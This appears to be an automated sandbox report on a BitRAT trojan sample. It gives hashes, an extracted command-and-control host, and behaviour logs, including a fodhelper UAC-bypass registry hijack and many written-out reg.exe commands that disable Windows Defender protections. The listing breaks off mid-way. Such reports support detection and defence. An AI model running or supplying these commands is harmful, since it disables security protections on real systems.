bitrat | bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3

Analysis

max time kernel
146s
max time network
153s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
17-08-2022 06:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Size

1.4MB
MD5

21f894391eaac76010275132312ac5c8
SHA1

c2f20f6d6a8881ddd0ac04f9d87a11d2e9a817f3
SHA256

bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3
SHA512

7cdd5fdfb40027a6c6fd5a6dbb0621a29dd183d318be6d203bca51b699c3e26219a4910cfc1ceaaa2183103577eb86e1fb84426e6b8a6f07127abb72bf36244e

Score

10^/10

bitrat evasion trojan upx

Malware Config

Extracted

Family

bitrat

Version

1.38

trotox.duckdns.org:55441

Attributes

communication_password
4b49ee1f55b1900518dfb23fd2d7c702
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 43 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exeConhost.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2656-127-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2656-217-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/5048-268-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4780-272-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4536-315-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/2656-700-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/5048-843-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4780-867-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4780-975-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/4536-982-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral1/memory/5048-992-0x0000000000400000-0x00000000007E4000-memory.dmp	upx

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

Processes:

bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exebec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe

pid	process
2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe

Drops file in Windows directory 1 IoCs

Processes:

fodhelper.exe

description ioc process

File created C:\Windows\rescache\_merged\2717123927\3950266016.pri fodhelper.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	fodhelper.exe

Modifies registry class 15 IoCs

Processes:

bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exebec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell\open	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe -uac 2656Ѐ"	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell\open\command\DelegateExecute	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell\open\command	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell\open	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell\open\command	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe -prs 2656ﬀ"	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe -wdkill"	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exebec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe

description	pid	process
Token: SeShutdownPrivilege	2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Token: SeDebugPrivilege	4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
Token: SeShutdownPrivilege	4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exebec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe

pid	process
2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
4536	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exefodhelper.exeschtasks.exefodhelper.exebec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exebec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe

description	pid	process	target process
PID 2656 wrote to memory of 488	2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	fodhelper.exe
PID 2656 wrote to memory of 488	2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	fodhelper.exe
PID 2656 wrote to memory of 4452	2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	fodhelper.exe
PID 2656 wrote to memory of 4452	2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	fodhelper.exe
PID 488 wrote to memory of 5048	488	fodhelper.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 488 wrote to memory of 5048	488	fodhelper.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 488 wrote to memory of 5048	488	fodhelper.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 4452 wrote to memory of 4780	4452	schtasks.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 4452 wrote to memory of 4780	4452	schtasks.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 4452 wrote to memory of 4780	4452	schtasks.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 2656 wrote to memory of 4808	2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	fodhelper.exe
PID 2656 wrote to memory of 4808	2656	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	fodhelper.exe
PID 4808 wrote to memory of 4536	4808	fodhelper.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 4808 wrote to memory of 4536	4808	fodhelper.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 4808 wrote to memory of 4536	4808	fodhelper.exe	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
PID 5048 wrote to memory of 5036	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 5036	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 5036	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4940	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4940	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4940	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4592	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4592	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4592	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4348	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4348	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4348	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 2716	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 2716	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 2716	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4604	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4604	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4604	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4512	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4512	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4512	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4608	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	Conhost.exe
PID 5048 wrote to memory of 4608	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	Conhost.exe
PID 5048 wrote to memory of 4608	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	Conhost.exe
PID 4780 wrote to memory of 4416	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4416	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4416	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4464	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4464	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 4464	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 3156	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 3156	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 3156	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 3140	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 3140	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 3140	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 776	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 776	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 776	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 920	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	Conhost.exe
PID 5048 wrote to memory of 920	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	Conhost.exe
PID 5048 wrote to memory of 920	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	Conhost.exe
PID 4780 wrote to memory of 816	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 816	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 816	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 1628	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 1628	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 5048 wrote to memory of 1628	5048	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe
PID 4780 wrote to memory of 4468	4780	bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
"C:\Users\Admin\AppData\Local\Temp\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
2⤵
PID:4452

C:\Users\Admin\AppData\Local\Temp\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
"C:\Users\Admin\AppData\Local\Temp\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe" -wdkill
3⤵
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:4940

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:2716

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:4512

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:4416

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3156

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:776

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:816

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:4592

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4468

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:3376

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:3904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:2732

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2304

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2748

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:4840

C:\Windows\SysWOW64\schtasks.exe
